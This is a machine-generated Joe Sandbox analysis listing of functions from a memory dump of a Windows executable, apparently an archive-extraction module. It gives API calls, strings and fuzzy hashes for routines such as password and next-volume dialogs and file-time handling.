Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
Instruction ID: c8333c06bd12d0ad7bae8cbed2d8f9fa469a73dc77f445144ff55acd70a39c69
Opcode Fuzzy Hash: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
Instruction Fuzzy Hash: 7DF06232500221ABF670EA6CE584C5B77EDAA107207648C5BF2C8D7515CBB5F880CB60

Function 01011FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01011FE5
_wcslen.LIBCMT ref: 01011FF6
_wcslen.LIBCMT ref: 01012006
_wcslen.LIBCMT ref: 01012014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0100B371,?,?,00000000,?,?,?), ref: 0101202F

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
Instruction ID: dedb9b0371da9c1cdf57d482c1c875e6784c658ef16abffee9ac1bdc85751d4a
Opcode Fuzzy Hash: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
Instruction Fuzzy Hash: 52F01D32008125BBCF226F51EC08DCE7F26EB44760B218415F69A5E0A1CB76D965D690

Function 010115FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 010117BC
_swprintf.LIBCMT ref: 0101186B

Strings

%ls, xrefs: 01011641, 01011657
%s: %s, xrefs: 010117CB

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: fe065ab3a9cc5eff1da0322037684990a1a80f09f798f740996de3738fee35c5
Instruction ID: d31775acd51c765dfa0a4ea334c43984f661dd46a68a754d96ee2ed87854c4e7
Opcode Fuzzy Hash: fe065ab3a9cc5eff1da0322037684990a1a80f09f798f740996de3738fee35c5
Instruction Fuzzy Hash: D251D535288301F6F62A1AB48D45F7D7676BB19B08F048D46F7C6784E8D9BFA410871A

Function 010231D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010231FB
_abort.LIBCMT ref: 01023306

Strings

MOC, xrefs: 0102320D
RCC, xrefs: 01023215

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
Instruction ID: c858d9e6591e3be99bb352e16ecf85288f4dd1bef9b27f5543531d9304656829
Opcode Fuzzy Hash: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
Instruction Fuzzy Hash: A7418D71900229AFDF16DF98CC81AEEBBB5FF09304F188099FA446B211D339E950DB50

Function 01007401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01007406

Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 010074CD

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Strings

SeSecurityPrivilege, xrefs: 0100744B
SeRestorePrivilege, xrefs: 01007460

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 2b78e14c86bcfce8256ce7ae79a54d657d33c495778037f924c0f34688ae90e7
Instruction ID: 6f04a2c1c482d9154cff54d49baf06ef2644776e36e69643ee98bc2ddebb20c5
Opcode Fuzzy Hash: 2b78e14c86bcfce8256ce7ae79a54d657d33c495778037f924c0f34688ae90e7
Instruction Fuzzy Hash: 5731D671E00259AAFF63EBA8CC44BEE7BA9BF55300F044055E5C5AB1C1CBB9A984C761

Function 0101AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0101ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0101ADC2

Strings

ASKNEXTVOL, xrefs: 0101AD28

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: a9525abd271ca87f4d914b22a003b4b4bc751f2406a0cd9fce8c509dc002820c
Instruction ID: 94bc755e958b0fdd24a033ed09095d4b0464aa2dc4a6026eed6cd84fb23f48e5
Opcode Fuzzy Hash: a9525abd271ca87f4d914b22a003b4b4bc751f2406a0cd9fce8c509dc002820c
Instruction Fuzzy Hash: 5011B132345641FFE262AF6CDC45FAA7BA9EB4A752F800044F2C2DB0ACC77B94059721

Function 0100D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0100D954
_strncpy.LIBCMT ref: 0100D99A

Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01041030,00000200,0100D928,00000000,?,00000050,01041030), ref: 01011DC4

Strings

@%s, xrefs: 0100D93E
$%s, xrefs: 0100D949

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
Instruction ID: 31def597853391b9143afd0f81739381f4809b5670d312a1ccd3346a033f7f1a
Opcode Fuzzy Hash: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
Instruction Fuzzy Hash: 3321D532800648AEFB22EEE8CC41FDE3BE9BF01300F040516FA909A1D1E332D249CB61

Function 01010E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E9F

Strings

Thread pool initialization failed., xrefs: 01010EB7

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 7f34a4e5cfc6d33f48118ab8da79ed0509bfe8c3620a1aaf27b64783884c3925
Instruction ID: da2b9517c12fdba17235caf7bda789cfad4f18e756de8c845cd89ed6d4cb695c
Opcode Fuzzy Hash: 7f34a4e5cfc6d33f48118ab8da79ed0509bfe8c3620a1aaf27b64783884c3925
Instruction Fuzzy Hash: 251151B16407099FD3314F6B98849A7FBECFB65754F14482EF1DAC6204D6B659808B50

Function 0101B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0101B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0101B304

Strings

GETPASSWORD1, xrefs: 0101B289

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
Instruction ID: 90168126a2390076cb5a9fa0461ac914f159448eabecc3f165c506425d23e3c1
Opcode Fuzzy Hash: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
Instruction Fuzzy Hash: E0110832900115B7EB629A689D49FFF7BBCFF59700F004050FAC5F60C8C7A9A91987A1

Function 0101DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0101DD1C, 0101DD50
RENAMEDLG, xrefs: 0101DD31

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
Instruction ID: a9b5f280b4583966a2c437509cd04fa4607b2dc3464208648edfb99c05be1b8c
Opcode Fuzzy Hash: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
Instruction Fuzzy Hash: 6301F5B9604244AFD730AED8FD8899A7FA8F748340B00482AF5C5C3228C73ED850DBA0

Function 01029A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 01029AA9
__alldvrm.LIBCMT ref: 01029CAA
__alldvrm.LIBCMT ref: 01029CCC

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: cf92f794dcef4a994ff41bcbf41fdddc51641b6d8b2ae45c24af45c74368076a
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: 5BA129729043BA9FEB26CF18C8917AEBFE5EF55318F2841ADD9C59B281C2398941C750

Function 0100A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,01007F69,?,?,?), ref: 0100A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,01007F69,?), ref: 0100A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,01007F69,?,?,?,?,?,?,?), ref: 0100A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,01007F69,?,?,?,?,?,?,?,?,?,?), ref: 0100A4C6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
Instruction ID: 020702c7db62fd5d77cef9a6f518e718593e5a6ad10676109ccb3f7a767d3cb5
Opcode Fuzzy Hash: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
Instruction Fuzzy Hash: E841AF312483819AF732DE28DC55FEFBBE8AB85700F04495DB6D1D71C0DAB89A48DB52

Function 01001100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0100112B
_wcslen.LIBCMT ref: 01001153
_wcslen.LIBCMT ref: 01001182
_wcslen.LIBCMT ref: 010011A9

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: cce129f31006e27da8112d56d0a1eda3a571ded943039947c7734ebb97adca33
Instruction ID: eec721f06f1dd6a54d9e524834f1e9bb5871a12db14cbfb8629f86163a5f8cbc
Opcode Fuzzy Hash: cce129f31006e27da8112d56d0a1eda3a571ded943039947c7734ebb97adca33
Instruction Fuzzy Hash: 5D41B7719006669BDB219F688C559DE7BB8EF14310F000059F9C9F7289DB34ED598BE0

Function 0102C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,010291E0,?,00000000,?,00000001,?,?,00000001,010291E0,?), ref: 0102C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0102CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01026CBE,?), ref: 0102CA70
__freea.LIBCMT ref: 0102CA79

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 56d0f153d39c0cb905f29f7f6a6b761015d4236384a408c17edb643204b09080
Instruction ID: ed2d6f2d6174f20c8c28b3809acced4443dd2bf137096f88a7eb9ee66b5ae090
Opcode Fuzzy Hash: 56d0f153d39c0cb905f29f7f6a6b761015d4236384a408c17edb643204b09080
Instruction Fuzzy Hash: 5131C172A0022AABEF25CF68DC85DFE7BA5EF41714B0442A8EC84E7250E735DD54CB90

Function 0101A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0101A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0101A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0101A683
ReleaseDC.USER32(00000000,00000000), ref: 0101A691

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
Instruction ID: 579ba39f9111fb4198bb62cc15749197ef82f3556b60e6f15499c4ba8277be48
Opcode Fuzzy Hash: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
Instruction Fuzzy Hash: A7E08C31A42720FBE2701BA0A91DB8B3E94BB05B52F004505FF899A188DB7E80088BE0

Function 0101A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0101A699: GetDC.USER32(00000000), ref: 0101A69D
Part of subcall function 0101A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0101A6A8
Part of subcall function 0101A699: ReleaseDC.USER32(00000000,00000000), ref: 0101A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0101A83C

Part of subcall function 0101AAC9: GetDC.USER32(00000000), ref: 0101AAD2
Part of subcall function 0101AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0101AB01
Part of subcall function 0101AAC9: ReleaseDC.USER32(00000000,?), ref: 0101AB99

Strings

(, xrefs: 0101A9AA

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
Instruction ID: dc3842d6006a8fa5fabe1f3ddbb26c5507f551926b0bdd9edbcccf53d03fea8b
Opcode Fuzzy Hash: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
Instruction Fuzzy Hash: A191F371604380EFD720DF25C884A2BBBE8FFC9611F00495EF99AD7225DB35A845CB62

Function 0102B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0102B324

Part of subcall function 01029097: IsProcessorFeaturePresent.KERNEL32(00000017,01029086,00000050,01033A34,?,0100D710,00000004,01041030,?,?,01029093,00000000,00000000,00000000,00000000,00000000), ref: 01029099
Part of subcall function 01029097: GetCurrentProcess.KERNEL32(C0000417,01033A34,00000050,01041030), ref: 010290BB
Part of subcall function 01029097: TerminateProcess.KERNEL32(00000000), ref: 010290C2

Strings

*?, xrefs: 0102B1FB
., xrefs: 0102B4DB

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
